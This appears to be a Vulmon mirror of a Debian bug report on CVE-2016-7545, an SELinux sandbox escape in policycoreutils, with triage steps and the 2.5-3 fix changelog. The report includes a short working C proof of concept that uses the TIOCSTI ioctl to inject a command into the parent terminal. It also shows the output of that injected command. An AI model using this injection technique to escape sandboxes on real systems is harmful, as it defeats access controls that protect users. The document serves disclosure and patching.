Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

policycoreutils: CVE-2016-7545: SELinux sandbox escape via TIOCSTI ioctl

Related Vulnerabilities: CVE-2016-7545   CVE-2016-2568   CVE-2016-2779  

Source

Debian Bug report logs - #838599
policycoreutils: CVE-2016-7545: SELinux sandbox escape via TIOCSTI ioctl

version graph

Package: policycoreutils; Maintainer for policycoreutils is Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>; Source for policycoreutils is src:policycoreutils (PTS, buildd, popcon).

Reported by: up201407890@alunos.dcc.fc.up.pt

Date: Thu, 22 Sep 2016 19:15:02 UTC

Severity: important

Tags: fixed-upstream, security, sid, stretch, upstream

Found in version policycoreutils/2.3-1

Fixed in version policycoreutils/2.5-3

Done: Laurent Bigonville <bigon@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox

Report forwarded to debian-bugs-dist@lists.debian.org, Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>:
Bug#838599; Package policycoreutils. (Thu, 22 Sep 2016 19:15:05 GMT) (full text, mbox, link).

Acknowledgement sent to up201407890@alunos.dcc.fc.up.pt:
New Bug report received and forwarded. Copy sent to Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>. (Thu, 22 Sep 2016 19:15:05 GMT) (full text, mbox, link).

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: up201407890@alunos.dcc.fc.up.pt
To: submit@bugs.debian.org
Subject: policycoreutils SELinux sandbox escape via TIOCSTI ioctl
Date: Thu, 22 Sep 2016 21:10:31 +0200
Package: policycoreutils
Severity: important
Tags: security

Hi,

When executing a program via the SELinux sandbox, the nonpriv session  
can escape to the parent session by using the TIOCSTI ioctl to push  
characters into the terminal's input buffer, allowing an attacker to  
escape the sandbox.

$ cat test.c
#include <unistd.h>
#include <sys/ioctl.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
  execlp("/bin/id", "id", NULL);
}

$ gcc test.c -o test
$ /bin/sandbox ./test
id
uid=1000 gid=1000 groups=1000  
context=unconfined_u:unconfined_r:sandbox_t:s0:c47,c176
[saken@ghetto ~]$ id    <------ did not type this
uid=1000(saken) gid=1000(saken) groups=1000(saken)  
context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023


This is similar to CVE-2016-2568, CVE-2016-2779, etc.

Thanks,
Federico Bento.

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Changed Bug title to 'policycoreutils: CVE-2016-7545: SELinux sandbox escape via TIOCSTI ioctl' from 'policycoreutils SELinux sandbox escape via TIOCSTI ioctl'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 25 Sep 2016 13:27:04 GMT) (full text, mbox, link).

Added tag(s) fixed-upstream and upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 25 Sep 2016 13:27:04 GMT) (full text, mbox, link).

Marked as found in versions policycoreutils/2.3-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sun, 25 Sep 2016 13:27:05 GMT) (full text, mbox, link).

Added tag(s) stretch and sid. Request was from Laurent Bigonville <bigon@debian.org> to control@bugs.debian.org. (Tue, 27 Sep 2016 11:27:03 GMT) (full text, mbox, link).

Reply sent to Laurent Bigonville <bigon@debian.org>:
You have taken responsibility. (Tue, 27 Sep 2016 22:33:22 GMT) (full text, mbox, link).

Notification sent to up201407890@alunos.dcc.fc.up.pt:
Bug acknowledged by developer. (Tue, 27 Sep 2016 22:33:22 GMT) (full text, mbox, link).

Message #18 received at 838599-close@bugs.debian.org (full text, mbox, reply):

From: Laurent Bigonville <bigon@debian.org>
To: 838599-close@bugs.debian.org
Subject: Bug#838599: fixed in policycoreutils 2.5-3
Date: Tue, 27 Sep 2016 22:29:39 +0000
Source: policycoreutils
Source-Version: 2.5-3

We believe that the bug you reported is fixed in the latest version of
policycoreutils, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 838599@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Laurent Bigonville <bigon@debian.org> (supplier of updated policycoreutils package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Tue, 27 Sep 2016 22:30:28 +0200
Source: policycoreutils
Binary: policycoreutils policycoreutils-python-utils python-sepolicy policycoreutils-gui policycoreutils-dev policycoreutils-sandbox restorecond mcstrans newrole
Architecture: source amd64 all
Version: 2.5-3
Distribution: unstable
Urgency: medium
Maintainer: Debian SELinux maintainers <selinux-devel@lists.alioth.debian.org>
Changed-By: Laurent Bigonville <bigon@debian.org>
Description:
 mcstrans   - SELinux core policy utilities (mcstrans utilities)
 newrole    - SELinux core policy utilities (newrole application for RBAC/MLS)
 policycoreutils - SELinux core policy utilities
 policycoreutils-dev - SELinux core policy utilities (development utilities)
 policycoreutils-gui - SELinux core policy utilities (graphical utilities)
 policycoreutils-python-utils - SELinux core policy utilities (Python utilities)
 policycoreutils-sandbox - SELinux core policy utilities (graphical sandboxes)
 python-sepolicy - Python binding for SELinux Policy Analyses
 restorecond - SELinux core policy utilities (restorecond utilities)
Closes: 836289 838599
Changes:
 policycoreutils (2.5-3) unstable; urgency=medium
 .
   * Team upload.
   * d/p/Dont_use_subprocess_getstatusoutput_in_Python_2_code.patch: Make the
     python code of chcat and sandbox compatible with both python2 and python3
   * debian/NEWS, debian/control: Fix a typo
   * Merge Fedora changes to the selinux-autorelabel systemd scripts and units.
     We now use a selinux-autorelabel.target and a generator that override the
     default.target in case we need to relabel the filesystems.
   * debian/patches/sandbox-dbus-run-session.patch: Use dbus-run-session
     instead of dbus-launch when available (Closes: #836289)
   * debian/patches/CVE-2016-7545.patch: create a new session for sandboxed
     processes (Closes: #838599 CVE-2016-7545)
   * debian/patches/sandbox-gobject-gtk.patch: Use GTK+ GObject introspection
     bindings instead of old pygtk2 ones
   * debian/patches/sandbox-x-window-manager.patch: Use system default window
     manager instead of openbox
Checksums-Sha1:
 ae285b0802ea725bf6fc6cde2ea768b3bbd7ef1a 2640 policycoreutils_2.5-3.dsc
 38317a9cab703bd69f4e5bd94fd07d2d46b2f320 31712 policycoreutils_2.5-3.debian.tar.xz
 e1593ffeefa65d5bb8c101e527a893d45a080130 54538 mcstrans-dbgsym_2.5-3_amd64.deb
 03ce5e25e11ca74bc88b611b7c00cf5cb9bcfc8c 138166 mcstrans_2.5-3_amd64.deb
 0e8156745cf3e614266b9d7aa16ca762ccf9e9c3 35652 newrole-dbgsym_2.5-3_amd64.deb
 8436a358af1dd2c2b519db553c572efe98f33a27 56282 newrole_2.5-3_amd64.deb
 2f9c3bdd421400b02242427002fd4ce801babe15 68646 policycoreutils-dbgsym_2.5-3_amd64.deb
 e13a09f59a25b77a537f352043b50e844d1005bb 45322 policycoreutils-dev-dbgsym_2.5-3_amd64.deb
 8f6f7ac33925686dbd2665d99d59a1203b85732b 172418 policycoreutils-dev_2.5-3_amd64.deb
 5de6243999baf4de4e7af6bde115fbb4b8c66d5a 1579600 policycoreutils-gui_2.5-3_all.deb
 d821945cbd4f1a2fd78f145e6b21c199a1ec037e 8196 policycoreutils-python-utils-dbgsym_2.5-3_amd64.deb
 832680630894beea793a1af0b1a1af769b4fb22a 86480 policycoreutils-python-utils_2.5-3_amd64.deb
 9708b357fe5e642e73e2cbd384aba8f288ade318 18000 policycoreutils-sandbox-dbgsym_2.5-3_amd64.deb
 14fdaddcd17eb363405db1cdbecc464836eabf76 48024 policycoreutils-sandbox_2.5-3_amd64.deb
 9d9faa0f41ded0ca2db511dc1d219ba92e815823 481042 policycoreutils_2.5-3_amd64.deb
 ac761fa3aa604c65d6cfee3dce59d1dcfb6d4c48 50110 python-sepolicy-dbgsym_2.5-3_amd64.deb
 d675417d3c67680b53f7e7d98f76cbf1076b38e5 77164 python-sepolicy_2.5-3_amd64.deb
 d71922a7351735f966209c558b92f12dcd3ecdbe 35844 restorecond-dbgsym_2.5-3_amd64.deb
 f04c4cbdec8ef369e4d7cf65fd5e730488a048a7 53454 restorecond_2.5-3_amd64.deb
Checksums-Sha256:
 7d127648aae91baad997051d62236532ea7d5d0fc9dad7b9bb74400a261c528d 2640 policycoreutils_2.5-3.dsc
 72d5fb13a7c1bfd134f2c60da7a3cf0ff62039e8081d8decaaacedd8670613ad 31712 policycoreutils_2.5-3.debian.tar.xz
 71ea0140c0813d3b8573aa6b64974ddf5ba8d545cc5e59d7d66fc5f0d7058820 54538 mcstrans-dbgsym_2.5-3_amd64.deb
 f9ceaa33fac38cdb81c70088b5392cbb3337769c2d81acb123c97afafea47919 138166 mcstrans_2.5-3_amd64.deb
 e199856dab04558904db240d01f13d28cb372e6019a7d10d3afbf568cf35b754 35652 newrole-dbgsym_2.5-3_amd64.deb
 d98b62b1fb4226009ca4b37ee0dd487cbc3a718c312d451ff149e4ee7be0465e 56282 newrole_2.5-3_amd64.deb
 9fedbbf9336dc1c3cb89a219fdeee0a9ad516fbb4c2f76ead2ae59174cb22c38 68646 policycoreutils-dbgsym_2.5-3_amd64.deb
 2bf6434cc9f27facedd7ff15e7f0b27b49f5070cf84afd68b23113a11cdf74b9 45322 policycoreutils-dev-dbgsym_2.5-3_amd64.deb
 e0eeae11a15c7e1c8f1d27e2a80a65dc7fb31a0bfe265955e502ae7dcbb1adf3 172418 policycoreutils-dev_2.5-3_amd64.deb
 c79e824640d80ac114b18409a42930beec16cef8889949b6144b737cc5476280 1579600 policycoreutils-gui_2.5-3_all.deb
 a02f5f6693d74e34ad73b9cd53bf0051eaa9d7509dd85d9f3407580ecad69ce0 8196 policycoreutils-python-utils-dbgsym_2.5-3_amd64.deb
 1f5114b38aaf3da8bc4d9dafab235b08a7d21c4031b01bc085beb7158729a284 86480 policycoreutils-python-utils_2.5-3_amd64.deb
 e5524e01c449c1629fd72a26de00381686d11e248b0f4835a6ede625e98644d3 18000 policycoreutils-sandbox-dbgsym_2.5-3_amd64.deb
 16d6c8eb0f37022f2483091b023189065a55f9077da59d8785d0b36981f3af49 48024 policycoreutils-sandbox_2.5-3_amd64.deb
 bd15f3cd8cee1bf98e49180765f46348fd492417662b3ecce6ad89a456c6c773 481042 policycoreutils_2.5-3_amd64.deb
 448e8333927dd49f5cbcd90a940aefde9ba4eaa44d136a8b25b3b6ed7d716812 50110 python-sepolicy-dbgsym_2.5-3_amd64.deb
 468b63538d0cf451de92787107081443013979db103f55f5a2917e4de0b86123 77164 python-sepolicy_2.5-3_amd64.deb
 7ba9a7d7495c4cc511a140b78f59391974c3188bf24fa8b618a05d28ee7a91d5 35844 restorecond-dbgsym_2.5-3_amd64.deb
 269ef7645ec1bfeedbb8d68c0a17d43b2bbb4511d06f6c13cc12e024d83fa769 53454 restorecond_2.5-3_amd64.deb
Files:
 a169586adf66bfeec9efa7f7e1b1fef5 2640 utils optional policycoreutils_2.5-3.dsc
 bb5cac94e0cd1f41c662993bc1bce659 31712 utils optional policycoreutils_2.5-3.debian.tar.xz
 8fe994bcf20635d2de226c57c0a2a7de 54538 debug extra mcstrans-dbgsym_2.5-3_amd64.deb
 c222f3faaf07b7e3dc85f68961d7cfa8 138166 utils extra mcstrans_2.5-3_amd64.deb
 809bee34f11d34d90d452d8ee487a3b8 35652 debug extra newrole-dbgsym_2.5-3_amd64.deb
 37a18c2efcf7d92523f3f2e3ffd9db13 56282 utils extra newrole_2.5-3_amd64.deb
 91a4c7f5d231d4f5667d0774ba66cab9 68646 debug extra policycoreutils-dbgsym_2.5-3_amd64.deb
 5bcd690625c6b22ebb731ef90ca07320 45322 debug extra policycoreutils-dev-dbgsym_2.5-3_amd64.deb
 007864b2af09fe8957be5b76185e9803 172418 devel optional policycoreutils-dev_2.5-3_amd64.deb
 6cc7dd3178d89992707aa8e532bbf7ad 1579600 utils extra policycoreutils-gui_2.5-3_all.deb
 ce5abf5e26831b670bae781a8f11af1b 8196 debug extra policycoreutils-python-utils-dbgsym_2.5-3_amd64.deb
 19af2de28b2ca326373fdcd74b396428 86480 utils optional policycoreutils-python-utils_2.5-3_amd64.deb
 38f221892e7a4b89ea2a784e7737e38b 18000 debug extra policycoreutils-sandbox-dbgsym_2.5-3_amd64.deb
 72fcc2c0eba01b5c89c661b88ce51aca 48024 utils extra policycoreutils-sandbox_2.5-3_amd64.deb
 5f09f38d9853b58c11fc6365846d7f2f 481042 utils optional policycoreutils_2.5-3_amd64.deb
 913506db1502c502c1eb05a8e212ddab 50110 debug extra python-sepolicy-dbgsym_2.5-3_amd64.deb
 1e57df4669f3d593468bed4fb6117bf0 77164 python optional python-sepolicy_2.5-3_amd64.deb
 81bc1d51cdfabeed16055f35610486b7 35844 debug extra restorecond-dbgsym_2.5-3_amd64.deb
 4b321a779b4e1a154e34d69aa9f98ade 53454 utils optional restorecond_2.5-3_amd64.deb

-----BEGIN PGP SIGNATURE-----

iQEuBAEBCAAYBQJX6tiCERxiaWdvbkBkZWJpYW4ub3JnAAoJEB/FiR66sEPVBDQH
/3gaOxK3lDbCYgX7JUfFyFVyKnYqbeU3kG+cCrLGlhJRm/5CECoycClrsNM4D19C
5S0fRWh9UK/j7Y/KCYsF94clYds+8labm6O+i5hm9RaxL0+beqdTzQ+OO9njWpnu
j2+OiROJVZFVp+vUhFseIORhEGGnhIyzK/otBxJxxFo+czkIrRj6fwYlMKSBNFeG
hbkzVNk1HhIqWPOD0v2RukWQTK0HpCj4sh7sFHzgxAvtzm7W++HJv6n4QnMahnjh
GjsFHrejKeFgpNwcKAcDDKAPmwQybKSVIGtKiNEA+vkd0G7v3MFPg1gF1bujyHj/
mGAt4HCJ0rzJWJso4BU0SFM=
=gQQn
-----END PGP SIGNATURE-----

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Mon, 31 Oct 2016 07:31:14 GMT) (full text, mbox, link).

Send a report that this bug log contains spam.

Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 13:50:34 2019; Machine Name: buxtehude

Debian Bug tracking system

Debbugs is free software and licensed under the terms of the GNU Public License version 2. The current version can be obtained from https://bugs.debian.org/debbugs-source/.

Copyright © 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson, 2005-2017 Don Armstrong, and many other contributors.

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started